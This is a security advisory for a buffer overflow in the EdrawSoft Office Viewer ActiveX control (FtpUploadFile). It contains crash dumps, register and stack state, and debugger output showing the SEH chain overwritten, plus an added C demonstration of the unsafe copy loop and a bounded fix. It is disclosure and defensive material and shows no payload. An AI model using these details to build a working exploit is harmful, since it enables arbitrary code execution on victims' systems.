EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC

The ActiveX control suffers from a buffer overflow vulnerability when a large number of bytes is passed to the FtpUploadFile member in the FtpUploadFile() function, resulting in memory corruption that overwrites several registers, including the SEH. An attacker can gain access to the affected system and execute arbitrary code.

--------------------------------------------------------------

CompanyName EdrawSoft
FileDescription Edraw Office Viewer Component
FileVersion 5.6.578.1

OriginalFileName officeviewer.ocx
ProductName OfficeViewerOCX
ProductVersion 5.6.5781

Report for Clsid: {F6FE8878-54D2-4333-B9F0-FC543B1BE1ED}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

Exception Code: ACCESS_VIOLATION
Disasm: 220324CC MOV [EDI],AX (officeviewermme.ocx)

Seh Chain:
--------------------------------------------------
1 410041

Called From Returns To
--------------------------------------------------
officeviewermme.220324CC officeviewermme.22026402

Registers:
--------------------------------------------------
EIP 220324CC
EAX 00000041
EBX 00001015
ECX 000002A0
EDX 001B2E4C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 01870000
ESI 0186E518 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0186C490 -> 0186C530
ESP 0186C488 -> 00000000

Block Disassembly:
--------------------------------------------------
220324BD MOV EDI,[EBP+8]
220324C0 MOV ESI,EDI
220324C2 TEST ECX,ECX
220324C4 JE SHORT 220324F7
220324C6 MOV EDX,[EBP+C]
220324C9 MOVZX EAX,WORD PTR [EDX]
220324CC MOV [EDI],AX <--- CRASH
220324CF INC EDI
220324D0 INC EDI
220324D1 INC EDX
220324D2 INC EDX
220324D3 TEST AX,AX
220324D6 JE SHORT 220324DB
220324D8 DEC ECX
220324D9 JNZ SHORT 220324C9

ArgDump:
--------------------------------------------------
EBP+8 0186E518 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 001B1364 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 00001014
EBP+20 00000000
EBP+24 000007FC
EBP+28 01761EC0 -> Uni: D5")"
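The block disassembly above is a plain wide-character copy loop: one 16-bit unit is read from [EDX] and written to [EDI], both pointers advance by two, the loop stops on a NUL unit or when ECX (a count supplied by the caller, not the size of the destination) runs out. The crash happens when EDI walks off the end of the destination into an unmapped page (01870000). The C below is an added illustration, not code from the advisory or from the vendor: it re-implements that loop beside a destination-bounded form and measures, inside a constructed in-process arena so nothing faults, how far a long source string spills past a fixed 16-unit field. The field size, arena layout and fill pattern are assumptions chosen for the demo; the 0x0041 source units mirror the "A" fill seen in the register and memory dumps.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed layout (assumption for the demo): a fixed 16-unit wide-char
 * field, followed by "adjacent memory" (the rest of the arena) pre-filled
 * with a recognisable pattern so any spill is easy to measure. */
#define FIELD_UNITS 16
#define ARENA_UNITS 64
#define FILL_UNIT   0xCCCC

/* Mirrors the advisory's block disassembly: copies up to `count` units,
 * stopping early only on a NUL unit. `count` comes from the caller
 * (EBP+16 = 0x1014 in the dump), never from the destination's size. */
size_t copy_wide_caller_count(uint16_t *dst, const uint16_t *src, size_t count)
{
    size_t written = 0;
    while (count != 0) {            /* TEST ECX,ECX / DEC ECX / JNZ */
        uint16_t unit = *src++;     /* MOVZX EAX,WORD PTR [EDX] ; INC EDX x2 */
        *dst++ = unit;              /* MOV [EDI],AX ; INC EDI x2 */
        written++;
        if (unit == 0) break;       /* TEST AX,AX / JE */
        count--;
    }
    return written;
}

/* Hardened form: bounded by the destination's capacity, always terminated. */
size_t copy_wide_bounded(uint16_t *dst, size_t dst_cap, const uint16_t *src)
{
    size_t n = 0;
    if (dst_cap == 0) return 0;
    while (n + 1 < dst_cap && src[n] != 0) { dst[n] = src[n]; n++; }
    dst[n] = 0;
    return n;
}

/* Constructed source: `units` copies of L'A' (0x0041) followed by a NUL. */
static void make_source(uint16_t *src, size_t units)
{
    for (size_t i = 0; i < units; i++) src[i] = 0x0041;
    src[units] = 0;
}

static void fill_arena(uint16_t *arena)
{
    for (size_t i = 0; i < ARENA_UNITS; i++) arena[i] = FILL_UNIT;
}

/* Number of units beyond the field that no longer hold the fill pattern. */
static size_t clobbered_units(const uint16_t *arena)
{
    size_t n = 0;
    for (size_t i = FIELD_UNITS; i < ARENA_UNITS; i++)
        if (arena[i] != FILL_UNIT) n++;
    return n;
}

static size_t cap_units(size_t src_units)
{
    /* Keep the demo inside the arena; the real control had no such limit. */
    return src_units > ARENA_UNITS - 2 ? ARENA_UNITS - 2 : src_units;
}

/* Spill (in units) when the caller-count loop copies a source of src_units. */
size_t unbounded_copy_spill(size_t src_units)
{
    uint16_t src[ARENA_UNITS], arena[ARENA_UNITS];
    src_units = cap_units(src_units);
    make_source(src, src_units);
    fill_arena(arena);
    /* As in the crash, the count is derived from the source, not the field. */
    copy_wide_caller_count(arena, src, src_units + 1);
    return clobbered_units(arena);
}

/* Spill when the destination-bounded copy is used instead: always 0. */
size_t bounded_copy_spill(size_t src_units)
{
    uint16_t src[ARENA_UNITS], arena[ARENA_UNITS];
    src_units = cap_units(src_units);
    make_source(src, src_units);
    fill_arena(arena);
    copy_wide_bounded(arena, FIELD_UNITS, src);
    return clobbered_units(arena);
}

/* The 32-bit value landing right after the field under the unbounded copy. */
uint32_t dword_after_field(size_t src_units)
{
    uint16_t src[ARENA_UNITS], arena[ARENA_UNITS];
    src_units = cap_units(src_units);
    make_source(src, src_units);
    fill_arena(arena);
    copy_wide_caller_count(arena, src, src_units + 1);
    return (uint32_t)arena[FIELD_UNITS] | ((uint32_t)arena[FIELD_UNITS + 1] << 16);
}

int main(void)
{
    printf("unbounded spill for 24 units: %zu units\n", unbounded_copy_spill(24));
    printf("bounded   spill for 24 units: %zu units\n", bounded_copy_spill(24));
    printf("dword after field: %08x\n", dword_after_field(24));
    return 0;
}
```

The dword that lands past the field is 00410041, the same value the dump shows in the SEH chain, which is what a wide-character "A" fill looks like once it overwrites a 32-bit slot. The fix is the usual one: size the copy by the destination (here `copy_wide_bounded`), not by the length of untrusted input.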

Stack Dump:
--------------------------------------------------
186C488 00 00 00 00 64 13 1B 00 30 C5 86 01 02 64 02 22 [....d........d..]
186C498 18 E5 86 01 64 13 1B 00 14 10 00 00 00 00 00 00 [....d...........]
186C4A8 FC 07 00 00 C0 1E 76 01 18 CD 86 01 18 D5 86 01 [......v.........]
186C4B8 18 ED 86 01 64 13 1B 00 10 CD 86 01 18 E5 86 01 [....d...........]
186C4C8 14 10 00 00 8E 33 1B 00 14 10 00 00 00 00 00 00 [................]

--------------------------------------------------------------

(6c9c.6c70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=00001015 ecx=000002a0 edx=001b2edc esi=0186e518 edi=01870000
eip=220324cc esp=0186c488 ebp=0186c490 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx -
officeviewermme!DllRegisterServer+0x23bbe:
220324cc 668907 mov word ptr [edi],ax ds:0023:01870000=????
0:004> !exchain
0186fa84: 00410041
Invalid exception stack at 00410041
0:004> d esi
0186e518 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e528 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e538 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e548 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e558 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186e588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:004> d edx
001b2edc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2eec 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2efc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f0c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f1c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f2c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f3c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
001b2f4c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:004> d esp+3000
0186f488 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f498 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4e8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0186f4f8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
0:004> !load msec; !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at officeviewermme!DllRegisterServer+0x0000000000023bbe (Hash=0x55146322.0x550a2c22)

User mode write access violations that are not near NULL are exploitable.

Advisory ID: ZSL-2012-5069
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php
